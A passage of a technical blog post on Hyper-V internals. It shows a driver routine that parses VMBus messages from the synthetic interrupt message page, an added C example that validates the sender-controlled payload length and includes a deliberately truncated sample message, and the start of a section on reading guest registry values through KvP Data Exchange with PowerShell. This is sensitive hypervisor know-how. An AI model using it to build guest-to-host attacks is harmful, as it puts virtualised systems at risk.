<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CHANNELMSG_OPENCHANNEL:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ParseOpenChannelMessage(pvmbMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">default</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Unhandled vmbus message"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvmbMessage->vmbHeader.msgtype);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error.pvSIMP is NULL"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function gets the number of the active logical processor and the SIM address, and reads the contents of SIM4 (slot 4). As an example, only the CHANNELMSG_OPENCHANNEL and CHANNELMSG_GPADL_HEADER message types are parsed, but the format of all message types can be found in LIS. VMBus messages are usually generated when the virtual machine is turned on or off, or when one of the Integration Services components is enabled or disabled. For example, when you enable the Data Exchange feature, you will see the following message in the debugger:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="64" src="https://lh4.googleusercontent.com/RMIDm9k5tcqBHHbCDszEDm_bJghJRE1TtcuiKk0q3n8QiBEb21evYFCykAdamjqIhSNC3yKGJREW8Wv3GsNY13pbkrG4M3ytOdVhzP27Nd5HEO7DlNFNROFTkx_xPTJHp0lFs-zna9QI1e8U" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="278" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
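<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The same decision tree as in the driver routine above, written as an added user-mode example (it is not the article's driver code): a slot of the SIM page is modelled as the 256-byte HV_MESSAGE of the Hyper-V TLFS, the VMBus message structures follow the LIS headers, and the payload is parsed for the two message types the article handles. The difference from the driver is that every cast of the payload is preceded by a length check against PayloadSize, which is set by the sender of the message. The HV message type that VMBus posts with (1), the function names and every sample field value are assumptions or constructed data, not values captured from a live system.</span></div>

```c
/* Added example, not the article's driver code: a stand-alone user-mode version of the
 * SIM slot 4 parsing above.  hv_message_t follows the HV_MESSAGE layout of the Hyper-V
 * TLFS and the VMBus structures follow the LIS headers; the HV message type VMBus posts
 * with (1) and every sample field value below are assumptions / constructed data. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#define HV_MESSAGE_PAYLOAD_BYTES 240u  /* 30 * sizeof(uint64_t) per TLFS */
#define HV_MESSAGE_TYPE_NONE     0u    /* HvMessageTypeNone: slot is empty */
#define VMBUS_HV_MESSAGE_TYPE    1u    /* type LIS vmbus_post_msg() uses (assumption) */

typedef struct {                       /* one 256-byte SIM slot (HV_MESSAGE) */
    uint32_t message_type;
    uint8_t  payload_size;             /* valid bytes in payload[]; sender-controlled */
    uint8_t  message_flags, reserved[2];
    uint64_t sender;                   /* partition id or port id */
    uint8_t  payload[HV_MESSAGE_PAYLOAD_BYTES];
} hv_message_t;

enum { CHANNELMSG_OPENCHANNEL = 5, CHANNELMSG_GPADL_HEADER = 8 };  /* LIS enum values */
typedef struct { uint32_t msgtype, padding; } vmbus_msg_hdr_t;       /* LIS header */
typedef struct {                       /* LIS vmbus_channel_open_channel, fixed part; */
    vmbus_msg_hdr_t header;            /* userdata[120] follows it in the real message */
    uint32_t openid, child_relid, ringbuffer_gpadlhandle, target_vp,
             downstream_ringbuffer_pageoffset;
} vmbus_open_channel_t;
typedef struct {                       /* LIS vmbus_channel_gpadl_header, fixed part; */
    vmbus_msg_hdr_t header;            /* gpa_range[] follows it */
    uint32_t child_relid, gpadl;
    uint16_t range_buflen, rangecount;
} vmbus_gpadl_header_t;

typedef enum { PARSE_EMPTY, PARSE_OPEN_CHANNEL, PARSE_GPADL_HEADER,
               PARSE_UNHANDLED, PARSE_TRUNCATED } parse_result_t;
typedef struct {
    uint32_t msgtype, child_relid;
    uint32_t handle;                   /* ring-buffer GPADL (open) or new GPADL id */
} parsed_vmbus_msg_t;

/* Same decision tree as the driver routine above; the difference is that every cast of
 * the payload is preceded by a check against payload_size, which the sender controls. */
parse_result_t parse_sim_slot(const hv_message_t *msg, parsed_vmbus_msg_t *out)
{
    vmbus_msg_hdr_t hdr;
    memset(out, 0, sizeof *out);
    if (msg->message_type == HV_MESSAGE_TYPE_NONE) return PARSE_EMPTY;
    if (msg->payload_size > HV_MESSAGE_PAYLOAD_BYTES || msg->payload_size < sizeof hdr)
        return PARSE_TRUNCATED;
    memcpy(&hdr, msg->payload, sizeof hdr);     /* memcpy: no alignment assumptions */
    out->msgtype = hdr.msgtype;
    switch (hdr.msgtype) {
    case CHANNELMSG_OPENCHANNEL: {
        vmbus_open_channel_t oc;
        if (msg->payload_size < sizeof oc) return PARSE_TRUNCATED;
        memcpy(&oc, msg->payload, sizeof oc);
        out->child_relid = oc.child_relid;
        out->handle      = oc.ringbuffer_gpadlhandle;
        return PARSE_OPEN_CHANNEL;
    }
    case CHANNELMSG_GPADL_HEADER: {
        vmbus_gpadl_header_t gh;
        if (msg->payload_size < sizeof gh) return PARSE_TRUNCATED;
        memcpy(&gh, msg->payload, sizeof gh);
        out->child_relid = gh.child_relid;
        out->handle      = gh.gpadl;
        return PARSE_GPADL_HEADER;
    }
    default:
        return PARSE_UNHANDLED;                 /* driver: "Unhandled vmbus message" */
    }
}

/* Constructed samples (made-up field values): a well-formed OPENCHANNEL slot, and a
 * GPADL_HEADER slot whose payload_size is deliberately shorter than the structure. */
void build_sample_open_channel(hv_message_t *msg)
{
    vmbus_open_channel_t oc = { { CHANNELMSG_OPENCHANNEL, 0 }, 1, 14, 0xE1E10001u, 0, 10 };
    memset(msg, 0, sizeof *msg);
    msg->message_type = VMBUS_HV_MESSAGE_TYPE;
    msg->payload_size = (uint8_t)(sizeof oc + 120);       /* + zeroed userdata[120] */
    memcpy(msg->payload, &oc, sizeof oc);
}
void build_sample_truncated_gpadl(hv_message_t *msg)
{
    vmbus_gpadl_header_t gh = { { CHANNELMSG_GPADL_HEADER, 0 }, 14, 0x4000u, 24, 1 };
    memset(msg, 0, sizeof *msg);
    msg->message_type = VMBUS_HV_MESSAGE_TYPE;
    msg->payload_size = (uint8_t)(sizeof(vmbus_msg_hdr_t) + 4); /* header + 4 bytes only */
    memcpy(msg->payload, &gh, sizeof gh);
}

int main(void)
{
    hv_message_t slot; parsed_vmbus_msg_t p;
    build_sample_open_channel(&slot);
    printf("open:  result=%d\n", (int)parse_sim_slot(&slot, &p));
    printf("       relid=%u gpadl=0x%x\n", (unsigned)p.child_relid, (unsigned)p.handle);
    build_sample_truncated_gpadl(&slot);
    printf("gpadl: result=%d (PARSE_TRUNCATED=%d)\n", (int)parse_sim_slot(&slot, &p), (int)PARSE_TRUNCATED);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The sample with the short PayloadSize is the case worth keeping in mind when a driver casts the SIM payload straight to a VMBus structure, as the routine above does: the header fits, so the message type dispatches normally, but the fields of the larger structure lie beyond the bytes the sender actually delivered.</span></div>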
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Integration Services - Data Exchange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, let's look at what data is exchanged between the guest OS and its parent partition, taking one of the Integration Services components, Data Exchange, as an example. This component allows the root OS to read data from particular registry keys in the guest OS. (Information about the KvP technology can again be found in the MSDN blog: http://goo.gl/R0U52l, </span><a href="http://goo.gl/8rVeNA" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://goo.gl/8rVeNA</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To verify this, in the guest OS we will create, under the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Virtual Machine\Guest, a value of "KvPDataValue".</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="30" src="https://lh6.googleusercontent.com/m86FpljZJ2XDmbTEO7X3aR11bDectwh3yBb0x1xcVgjMi9pRRSgfsMAjBrigERavAvjFpJCxaMfz0HfZRfViNQklZb46PB2iuP7dKbCko9OIIWubwaR3kFuTlCxJk3HWVQkFRzmf4dROduah" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="226" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To read the value of the key from the root OS, the following PowerShell script was used:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Get-WmiObject</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Namespace</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">root\virtualization\v2</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Class</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Msvm_ComputerSystem</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Filter</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ElementName</span><span 
style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">'Windows Server 2012 R2 Gen1'</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GetRelated(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Msvm_KvpExchangeComponent"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GuestExchangeItems </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">|</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 
10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">%</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { </span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[</span><span style="background-color: transparent; color: teal; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XML</span><span 
